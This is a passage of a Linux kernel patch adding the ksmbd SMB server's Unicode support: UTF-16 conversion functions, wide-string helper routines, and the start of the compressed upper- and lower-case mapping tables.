++ * Return:	string length after conversion
++ */
++int smb_strtoUTF16(__le16 *to, const char *from, int len,
++		   const struct nls_table *codepage)
++{
++	int charlen;
++	int i;
++	wchar_t wchar_to; /* needed to quiet sparse */
++
++	/* special case for utf8 to handle chars outside plane 0 */
++	if (!strcmp(codepage->charset, "utf8")) {
++		/*
++		 * Convert utf8 -> utf16. We assume the destination is large
++		 * enough, as the caller should have ensured the conversion
++		 * does not overflow it; len is the length in wchar_t units
++		 * (16 bits).
++		 */
++		i  = utf8s_to_utf16s(from, len, UTF16_LITTLE_ENDIAN,
++				     (wchar_t *)to, len);
++
++		/* on success, terminate and exit */
++		if (i >= 0)
++			goto success;
++		/*
++		 * If it fails, fall back to UCS encoding, as this
++		 * function should not return negative values.
++		 * Currently it can fail only if the source contains
++		 * invalidly encoded characters.
++		 */
++	}
++
++	for (i = 0; len > 0 && *from; i++, from += charlen, len -= charlen) {
++		charlen = codepage->char2uni(from, len, &wchar_to);
++		if (charlen < 1) {
++			/* A question mark */
++			wchar_to = 0x003f;
++			charlen = 1;
++		}
++		put_unaligned_le16(wchar_to, &to[i]);
++	}
++
++success:
++	put_unaligned_le16(0, &to[i]);
++	return i;
++}
++
++/*
++ * smb_strndup_from_utf16() - copy a string from wire format to the local
++ *		codepage
++ * @src:	source string
++ * @maxlen:	don't walk past this many bytes in the source string
++ * @is_unicode:	is this a unicode string?
++ * @codepage:	destination codepage
++ *
++ * Take a string given by the client, convert it to the local codepage and
++ * put it in a new buffer. Returns a pointer to the new string or an
++ * ERR_PTR() on error.
++ *
++ * Return:	destination string buffer or error ptr
++ */
++char *smb_strndup_from_utf16(const char *src, const int maxlen,
++			     const bool is_unicode,
++			     const struct nls_table *codepage)
++{
++	int len, ret;
++	char *dst;
++
++	if (is_unicode) {
++		len = smb_utf16_bytes((__le16 *)src, maxlen, codepage);
++		len += nls_nullsize(codepage);
++		dst = kmalloc(len, GFP_KERNEL);
++		if (!dst)
++			return ERR_PTR(-ENOMEM);
++		ret = smb_from_utf16(dst, (__le16 *)src, len, maxlen, codepage,
++				     false);
++		if (ret < 0) {
++			kfree(dst);
++			return ERR_PTR(-EINVAL);
++		}
++	} else {
++		len = strnlen(src, maxlen);
++		len++;
++		dst = kmalloc(len, GFP_KERNEL);
++		if (!dst)
++			return ERR_PTR(-ENOMEM);
++		strscpy(dst, src, len);
++	}
++
++	return dst;
++}
++
++/*
++ * smbConvertToUTF16() - convert string from local charset to utf16
++ * @target:	destination buffer
++ * @source:	source buffer
++ * @srclen:	source buffer size (in bytes)
++ * @cp:		codepage to which characters should be converted
++ * @mapchars:	should characters be remapped according to the mapchars option?
++ *
++ * Convert a pathname to 16 bit Unicode wire format from a string in the
++ * current code page. Conversion may involve remapping the six characters
++ * that are only legal in a POSIX-like OS (if they are present in the
++ * string). Path names are little endian 16 bit Unicode on the wire.
++ *
++ * Return:	char length after conversion
++ */
++int smbConvertToUTF16(__le16 *target, const char *source, int srclen,
++		      const struct nls_table *cp, int mapchars)
++{
++	int i, j, charlen;
++	char src_char;
++	__le16 dst_char;
++	wchar_t tmp;
++
++	if (!mapchars)
++		return smb_strtoUTF16(target, source, srclen, cp);
++
++	for (i = 0, j = 0; i < srclen; j++) {
++		src_char = source[i];
++		charlen = 1;
++		switch (src_char) {
++		case 0:
++			put_unaligned(0, &target[j]);
++			return j;
++		case ':':
++			dst_char = cpu_to_le16(UNI_COLON);
++			break;
++		case '*':
++			dst_char = cpu_to_le16(UNI_ASTERISK);
++			break;
++		case '?':
++			dst_char = cpu_to_le16(UNI_QUESTION);
++			break;
++		case '<':
++			dst_char = cpu_to_le16(UNI_LESSTHAN);
++			break;
++		case '>':
++			dst_char = cpu_to_le16(UNI_GRTRTHAN);
++			break;
++		case '|':
++			dst_char = cpu_to_le16(UNI_PIPE);
++			break;
++		/*
++		 * FIXME: We cannot handle remapping backslash (UNI_SLASH)
++		 * until all the calls to build_path_from_dentry are modified,
++		 * as they use backslash as separator.
++		 */
++		default:
++			charlen = cp->char2uni(source + i, srclen - i, &tmp);
++			dst_char = cpu_to_le16(tmp);
++
++			/*
++			 * if no match, use question mark, which at least in
++			 * some cases serves as wild card
++			 */
++			if (charlen < 1) {
++				dst_char = cpu_to_le16(0x003f);
++				charlen = 1;
++			}
++		}
++		/*
++		 * character may take more than one byte in the source string,
++		 * but will take exactly two bytes in the target string
++		 */
++		i += charlen;
++		put_unaligned(dst_char, &target[j]);
++	}
++
++	return j;
++}
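++
++/*
++ * Worked round trip (illustrative; cp is any loaded nls_table): the six
++ * reserved characters are shifted into the private-use area by adding
++ * 0xF000 on the way out, and cifs_mapchar() shifts them back on the way
++ * in.
++ */
++#if 0	/* example only */
++static void example_roundtrip(const struct nls_table *cp)
++{
++	__le16 wire[8];
++	int n = smbConvertToUTF16(wire, "a:b", 3, cp, 1);
++
++	/* wire now holds 'a', UNI_COLON (0xF03A), 'b'; n == 3 code units */
++	(void)n;
++}
++#endif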
+diff --git a/fs/smb/server/unicode.h b/fs/smb/server/unicode.h
+new file mode 100644
+index 0000000000000..076f6034a7899
+--- /dev/null
++++ b/fs/smb/server/unicode.h
+@@ -0,0 +1,358 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ * Some of the source code in this file came from fs/cifs/cifs_unicode.c
++ * cifs_unicode:  Unicode kernel case support
++ *
++ * Function:
++ *     Convert a unicode character to upper or lower case using
++ *     compressed tables.
++ *
++ *   Copyright (c) International Business Machines  Corp., 2000,2009
++ *
++ * Notes:
++ *     These APIs are based on the C library functions.  The semantics
++ *     should match the C functions but with expanded size operands.
++ *
++ *     The upper/lower functions are based on a table created by mkupr.
++ *     This is a compressed table of upper and lower case conversion.
++ *
++ */
++#ifndef _CIFS_UNICODE_H
++#define _CIFS_UNICODE_H
++
++#include <asm/byteorder.h>
++#include <linux/types.h>
++#include <linux/nls.h>
++#include <linux/unicode.h>
++
++#define  UNIUPR_NOLOWER		/* Do not expand the lower case tables */
++
++/*
++ * Windows maps these to the user defined 16 bit Unicode range since they are
++ * reserved symbols (along with \ and /), otherwise illegal to store
++ * in filenames in NTFS
++ */
++#define UNI_ASTERISK    ((__u16)('*' + 0xF000))
++#define UNI_QUESTION    ((__u16)('?' + 0xF000))
++#define UNI_COLON       ((__u16)(':' + 0xF000))
++#define UNI_GRTRTHAN    ((__u16)('>' + 0xF000))
++#define UNI_LESSTHAN    ((__u16)('<' + 0xF000))
++#define UNI_PIPE        ((__u16)('|' + 0xF000))
++#define UNI_SLASH       ((__u16)('\\' + 0xF000))
++
++/* Just define what we want from uniupr.h.  We don't want to define the tables
++ * in each source file.
++ */
++#ifndef	UNICASERANGE_DEFINED
++struct UniCaseRange {
++	wchar_t start;
++	wchar_t end;
++	signed char *table;
++};
++#endif				/* UNICASERANGE_DEFINED */
++
++#ifndef UNIUPR_NOUPPER
++extern signed char SmbUniUpperTable[512];
++extern const struct UniCaseRange SmbUniUpperRange[];
++#endif				/* UNIUPR_NOUPPER */
++
++#ifndef UNIUPR_NOLOWER
++extern signed char CifsUniLowerTable[512];
++extern const struct UniCaseRange CifsUniLowerRange[];
++#endif				/* UNIUPR_NOLOWER */
++
++#ifdef __KERNEL__
++int smb_strtoUTF16(__le16 *to, const char *from, int len,
++		   const struct nls_table *codepage);
++char *smb_strndup_from_utf16(const char *src, const int maxlen,
++			     const bool is_unicode,
++			     const struct nls_table *codepage);
++int smbConvertToUTF16(__le16 *target, const char *source, int srclen,
++		      const struct nls_table *cp, int mapchars);
++char *ksmbd_extract_sharename(struct unicode_map *um, const char *treename);
++#endif
++
++/*
++ * UniStrcat:  Concatenate the second string to the first
++ *
++ * Returns:
++ *     Address of the first string
++ */
++static inline wchar_t *UniStrcat(wchar_t *ucs1, const wchar_t *ucs2)
++{
++	wchar_t *anchor = ucs1;	/* save a pointer to start of ucs1 */
++
++	while (*ucs1++)
++	/*NULL*/;	/* To end of first string */
++	ucs1--;			/* Return to the null */
++	while ((*ucs1++ = *ucs2++))
++	/*NULL*/;	/* copy string 2 over */
++	return anchor;
++}
++
++/*
++ * UniStrchr:  Find a character in a string
++ *
++ * Returns:
++ *     Address of first occurrence of character in string
++ *     or NULL if the character is not in the string
++ */
++static inline wchar_t *UniStrchr(const wchar_t *ucs, wchar_t uc)
++{
++	while ((*ucs != uc) && *ucs)
++		ucs++;
++
++	if (*ucs == uc)
++		return (wchar_t *)ucs;
++	return NULL;
++}
++
++/*
++ * UniStrcmp:  Compare two strings
++ *
++ * Returns:
++ *     < 0:  First string is less than second
++ *     = 0:  Strings are equal
++ *     > 0:  First string is greater than second
++ */
++static inline int UniStrcmp(const wchar_t *ucs1, const wchar_t *ucs2)
++{
++	while ((*ucs1 == *ucs2) && *ucs1) {
++		ucs1++;
++		ucs2++;
++	}
++	return (int)*ucs1 - (int)*ucs2;
++}
++
++/*
++ * UniStrcpy:  Copy a string
++ */
++static inline wchar_t *UniStrcpy(wchar_t *ucs1, const wchar_t *ucs2)
++{
++	wchar_t *anchor = ucs1;	/* save the start of result string */
++
++	while ((*ucs1++ = *ucs2++))
++	/*NULL*/;
++	return anchor;
++}
++
++/*
++ * UniStrlen:  Return the length of a string (in 16 bit Unicode chars not bytes)
++ */
++static inline size_t UniStrlen(const wchar_t *ucs1)
++{
++	int i = 0;
++
++	while (*ucs1++)
++		i++;
++	return i;
++}
++
++/*
++ * UniStrnlen:  Return the length (in 16 bit Unicode chars not bytes) of a
++ *		string (length limited)
++ */
++static inline size_t UniStrnlen(const wchar_t *ucs1, int maxlen)
++{
++	int i = 0;
++
++	while (*ucs1++) {
++		i++;
++		if (i >= maxlen)
++			break;
++	}
++	return i;
++}
++
++/*
++ * UniStrncat:  Concatenate length limited string
++ */
++static inline wchar_t *UniStrncat(wchar_t *ucs1, const wchar_t *ucs2, size_t n)
++{
++	wchar_t *anchor = ucs1;	/* save pointer to string 1 */
++
++	while (*ucs1++)
++	/*NULL*/;
++	ucs1--;			/* point to null terminator of s1 */
++	while (n-- && (*ucs1 = *ucs2)) {	/* copy s2 after s1 */
++		ucs1++;
++		ucs2++;
++	}
++	*ucs1 = 0;		/* Null terminate the result */
++	return anchor;
++}
++
++/*
++ * UniStrncmp:  Compare length limited string
++ */
++static inline int UniStrncmp(const wchar_t *ucs1, const wchar_t *ucs2, size_t n)
++{
++	if (!n)
++		return 0;	/* Null strings are equal */
++	while ((*ucs1 == *ucs2) && *ucs1 && --n) {
++		ucs1++;
++		ucs2++;
++	}
++	return (int)*ucs1 - (int)*ucs2;
++}
++
++/*
++ * UniStrncmp_le:  Compare length limited string - native to little-endian
++ */
++static inline int
++UniStrncmp_le(const wchar_t *ucs1, const wchar_t *ucs2, size_t n)
++{
++	if (!n)
++		return 0;	/* Null strings are equal */
++	while ((*ucs1 == __le16_to_cpu(*ucs2)) && *ucs1 && --n) {
++		ucs1++;
++		ucs2++;
++	}
++	return (int)*ucs1 - (int)__le16_to_cpu(*ucs2);
++}
++
++/*
++ * UniStrncpy:  Copy length limited string with pad
++ */
++static inline wchar_t *UniStrncpy(wchar_t *ucs1, const wchar_t *ucs2, size_t n)
++{
++	wchar_t *anchor = ucs1;
++
++	while (n-- && *ucs2)	/* Copy the strings */
++		*ucs1++ = *ucs2++;
++
++	n++;
++	while (n--)		/* Pad with nulls */
++		*ucs1++ = 0;
++	return anchor;
++}
++
++/*
++ * UniStrncpy_le:  Copy length limited string with pad to little-endian
++ */
++static inline wchar_t *UniStrncpy_le(wchar_t *ucs1, const wchar_t *ucs2, size_t n)
++{
++	wchar_t *anchor = ucs1;
++
++	while (n-- && *ucs2)	/* Copy the strings */
++		*ucs1++ = __le16_to_cpu(*ucs2++);
++
++	n++;
++	while (n--)		/* Pad with nulls */
++		*ucs1++ = 0;
++	return anchor;
++}
++
++/*
++ * UniStrstr:  Find a string in a string
++ *
++ * Returns:
++ *     Address of first match found
++ *     NULL if no matching string is found
++ */
++static inline wchar_t *UniStrstr(const wchar_t *ucs1, const wchar_t *ucs2)
++{
++	const wchar_t *anchor1 = ucs1;
++	const wchar_t *anchor2 = ucs2;
++
++	while (*ucs1) {
++		if (*ucs1 == *ucs2) {
++			/* Partial match found */
++			ucs1++;
++			ucs2++;
++		} else {
++			if (!*ucs2)	/* Match found */
++				return (wchar_t *)anchor1;
++			ucs1 = ++anchor1;	/* No match */
++			ucs2 = anchor2;
++		}
++	}
++
++	if (!*ucs2)		/* Both end together */
++		return (wchar_t *)anchor1;	/* Match found */
++	return NULL;		/* No match */
++}
++
++#ifndef UNIUPR_NOUPPER
++/*
++ * UniToupper:  Convert a unicode character to upper case
++ */
++static inline wchar_t UniToupper(register wchar_t uc)
++{
++	register const struct UniCaseRange *rp;
++
++	if (uc < sizeof(SmbUniUpperTable)) {
++		/* Latin characters */
++		return uc + SmbUniUpperTable[uc];	/* Use base tables */
++	}
++
++	rp = SmbUniUpperRange;	/* Use range tables */
++	while (rp->start) {
++		if (uc < rp->start)	/* Before start of range */
++			return uc;	/* Uppercase = input */
++		if (uc <= rp->end)	/* In range */
++			return uc + rp->table[uc - rp->start];
++		rp++;	/* Try next range */
++	}
++	return uc;		/* Past last range */
++}
++
++/*
++ * UniStrupr:  Upper case a unicode string
++ */
++static inline __le16 *UniStrupr(register __le16 *upin)
++{
++	register __le16 *up;
++
++	up = upin;
++	while (*up) {		/* For all characters */
++		*up = cpu_to_le16(UniToupper(le16_to_cpu(*up)));
++		up++;
++	}
++	return upin;		/* Return input pointer */
++}
++#endif				/* UNIUPR_NOUPPER */
++
++#ifndef UNIUPR_NOLOWER
++/*
++ * UniTolower:  Convert a unicode character to lower case
++ */
++static inline wchar_t UniTolower(register wchar_t uc)
++{
++	register const struct UniCaseRange *rp;
++
++	if (uc < sizeof(CifsUniLowerTable)) {
++		/* Latin characters */
++		return uc + CifsUniLowerTable[uc];	/* Use base tables */
++	}
++
++	rp = CifsUniLowerRange;	/* Use range tables */
++	while (rp->start) {
++		if (uc < rp->start)	/* Before start of range */
++			return uc;	/* Lowercase = input */
++		if (uc <= rp->end)	/* In range */
++			return uc + rp->table[uc - rp->start];
++		rp++;	/* Try next range */
++	}
++	return uc;		/* Past last range */
++}
++
++/*
++ * UniStrlwr:  Lower case a unicode string
++ */
++static inline wchar_t *UniStrlwr(register wchar_t *upin)
++{
++	register wchar_t *up;
++
++	up = upin;
++	while (*up) {		/* For all characters */
++		*up = UniTolower(*up);
++		up++;
++	}
++	return upin;		/* Return input pointer */
++}
++
++#endif
++
++#endif /* _CIFS_UNICODE_H */
+diff --git a/fs/smb/server/uniupr.h b/fs/smb/server/uniupr.h
+new file mode 100644
+index 0000000000000..26583b776897b
+--- /dev/null
++++ b/fs/smb/server/uniupr.h
+@@ -0,0 +1,268 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Some of the source code in this file came from fs/cifs/uniupr.h
++ *   Copyright (c) International Business Machines  Corp., 2000,2002
++ *
++ * uniupr.h - Unicode compressed case ranges
++ *
++ */
++#ifndef __KSMBD_UNIUPR_H
++#define __KSMBD_UNIUPR_H
++
++#ifndef UNIUPR_NOUPPER
++/*
++ * Latin upper case
++ */
++signed char SmbUniUpperTable[512] = {
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 000-00f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 010-01f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 020-02f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 030-03f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 040-04f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 050-05f */
++	0, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
++				-32, -32, -32, -32, -32,	/* 060-06f */
++	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
++				-32, 0, 0, 0, 0, 0,	/* 070-07f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 080-08f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 090-09f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0a0-0af */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0b0-0bf */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0c0-0cf */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0d0-0df */
++	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
++			 -32, -32, -32, -32, -32, -32,	/* 0e0-0ef */
++	-32, -32, -32, -32, -32, -32, -32, 0, -32, -32,
++			 -32, -32, -32, -32, -32, 121,	/* 0f0-0ff */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 100-10f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 110-11f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 120-12f */
++	0, 0, 0, -1, 0, -1, 0, -1, 0, 0, -1, 0, -1, 0, -1, 0,	/* 130-13f */
++	-1, 0, -1, 0, -1, 0, -1, 0, -1, 0, 0, -1, 0, -1, 0, -1,	/* 140-14f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 150-15f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 160-16f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, 0, -1, 0, -1, 0, -1, 0,	/* 170-17f */
++	0, 0, 0, -1, 0, -1, 0, 0, -1, 0, 0, 0, -1, 0, 0, 0,	/* 180-18f */
++	0, 0, -1, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0, 0,	/* 190-19f */
++	0, -1, 0, -1, 0, -1, 0, 0, -1, 0, 0, 0, 0, -1, 0, 0,	/* 1a0-1af */
++	-1, 0, 0, 0, -1, 0, -1, 0, 0, -1, 0, 0, 0, -1, 0, 0,	/* 1b0-1bf */
++	0, 0, 0, 0, 0, -1, -2, 0, -1, -2, 0, -1, -2, 0, -1, 0,	/* 1c0-1cf */
++	-1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, -79, 0, -1, /* 1d0-1df */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e0-1ef */
++	0, 0, -1, -2, 0, -1, 0, 0, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1f0-1ff */
++};
++
++/* Upper case range - Greek */
++static signed char UniCaseRangeU03a0[47] = {
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -38, -37, -37, -37,	/* 3a0-3af */
++	0, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
++					 -32, -32, -32, -32,	/* 3b0-3bf */
++	-32, -32, -31, -32, -32, -32, -32, -32, -32, -32, -32, -32, -64,
++	-63, -63,
++};
++
++/* Upper case range - Cyrillic */
++static signed char UniCaseRangeU0430[48] = {
++	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
++					 -32, -32, -32, -32,	/* 430-43f */
++	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
++					 -32, -32, -32, -32,	/* 440-44f */
++	0, -80, -80, -80, -80, -80, -80, -80, -80, -80, -80,
++					 -80, -80, 0, -80, -80,	/* 450-45f */
++};
++
++/* Upper case range - Extended cyrillic */
++static signed char UniCaseRangeU0490[61] = {
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 490-49f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 4a0-4af */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 4b0-4bf */
++	0, 0, -1, 0, -1, 0, 0, 0, -1, 0, 0, 0, -1,
++};
++
++/* Upper case range - Extended latin and greek */
++static signed char UniCaseRangeU1e00[509] = {
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e00-1e0f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e10-1e1f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e20-1e2f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e30-1e3f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e40-1e4f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e50-1e5f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e60-1e6f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e70-1e7f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e80-1e8f */
++	0, -1, 0, -1, 0, -1, 0, 0, 0, 0, 0, -59, 0, -1, 0, -1,	/* 1e90-1e9f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ea0-1eaf */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1eb0-1ebf */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ec0-1ecf */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ed0-1edf */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ee0-1eef */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, 0, 0, 0, 0, 0,	/* 1ef0-1eff */
++	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f00-1f0f */
++	8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f10-1f1f */
++	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f20-1f2f */
++	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f30-1f3f */
++	8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f40-1f4f */
++	0, 8, 0, 8, 0, 8, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f50-1f5f */
++	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f60-1f6f */
++	74, 74, 86, 86, 86, 86, 100, 100, 0, 0, 112, 112,
++				 126, 126, 0, 0,	/* 1f70-1f7f */
++	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f80-1f8f */
++	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f90-1f9f */
++	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fa0-1faf */
++	8, 8, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fb0-1fbf */
++	0, 0, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fc0-1fcf */
++	8, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fd0-1fdf */
++	8, 8, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fe0-1fef */
++	0, 0, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0,
++};
++
++/* Upper case range - Wide latin */
++static signed char UniCaseRangeUff40[27] = {
++	0, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
++			 -32, -32, -32, -32, -32,	/* ff40-ff4f */
++	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
++};
++
++/*
++ * Upper Case Range
++ */
++const struct UniCaseRange SmbUniUpperRange[] = {
++	{0x03a0, 0x03ce, UniCaseRangeU03a0},
++	{0x0430, 0x045f, UniCaseRangeU0430},
++	{0x0490, 0x04cc, UniCaseRangeU0490},
++	{0x1e00, 0x1ffc, UniCaseRangeU1e00},
++	{0xff40, 0xff5a, UniCaseRangeUff40},
++	{0}
++};
++#endif
++
++#ifndef UNIUPR_NOLOWER
++/*
++ * Latin lower case
++ */
++signed char CifsUniLowerTable[512] = {
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 000-00f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 010-01f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 020-02f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 030-03f */
++	0, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
++					 32, 32, 32,	/* 040-04f */
++	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 0, 0,
++					 0, 0, 0,	/* 050-05f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 060-06f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 070-07f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 080-08f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 090-09f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0a0-0af */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0b0-0bf */
++	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
++				 32, 32, 32, 32,	/* 0c0-0cf */
++	32, 32, 32, 32, 32, 32, 32, 0, 32, 32, 32, 32,
++					 32, 32, 32, 0,	/* 0d0-0df */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0e0-0ef */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0f0-0ff */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 100-10f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 110-11f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 120-12f */
++	0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 1,	/* 130-13f */
++	0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0,	/* 140-14f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 150-15f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 160-16f */
++	1, 0, 1, 0, 1, 0, 1, 0, -121, 1, 0, 1, 0, 1, 0,
++						 0,	/* 170-17f */
++	0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 79,
++						 0,	/* 180-18f */
++	0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0,	/* 190-19f */
++	1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1,	/* 1a0-1af */
++	0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0,	/* 1b0-1bf */
++	0, 0, 0, 0, 2, 1, 0, 2, 1, 0, 2, 1, 0, 1, 0, 1,	/* 1c0-1cf */
++	0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0,	/* 1d0-1df */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e0-1ef */
++	0, 2, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1f0-1ff */
++};
++
++/* Lower case range - Greek */
++static signed char UniCaseRangeL0380[44] = {
++	0, 0, 0, 0, 0, 0, 38, 0, 37, 37, 37, 0, 64, 0, 63, 63,	/* 380-38f */
++	0, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
++						 32, 32, 32,	/* 390-39f */
++	32, 32, 0, 32, 32, 32, 32, 32, 32, 32, 32, 32,
++};
++
++/* Lower case range - Cyrillic */
++static signed char UniCaseRangeL0400[48] = {
